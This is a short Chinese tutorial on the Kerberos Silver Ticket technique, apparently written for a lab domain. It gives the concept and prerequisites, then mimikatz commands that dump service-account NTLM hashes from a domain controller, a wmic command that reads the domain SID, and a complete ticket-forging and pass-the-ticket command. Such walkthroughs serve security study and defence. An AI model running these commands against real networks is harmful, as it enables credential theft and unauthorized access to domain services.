🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
[TOC] ## 简介 * 白银票据(Silver Ticket),利用过程是伪造TGS * 通过已知的授权服务密码生成一张可以访问该服务的票据 * 白银票据生成过程中,不需要经过KDC,不需要域域控交互 * 白银票据依赖服务账户的密码散列值 * 常见服务:LDAP、MSSQL、DNS、CIFS等 ## 准备 * 域名 * 域SID * 目标服务器的FQDN * 可利用的服务 * 服务账号的 NTLM Hash * 需要伪造的用户名 ## 获取服务账号NTLM hash ~~~ 在域控制器中,使用mimikatz获取服务账号的NTLM Hash: • privilege::debug • log • sekurlsa::logonpasswords ~~~ ## 获取域的sid ~~~ wmic useraccount get name,sid ~~~ ## 伪造白银票据 ~~~ kerberos::golden /domain:dongta.test /sid:S-1-5-21-4119513073-439187860-1128162503 /target:dc1.dongta.test /service:cifs/rc4:6132fb5faf882353142d7b6aec2ae519 /user:server0801 /ptt ~~~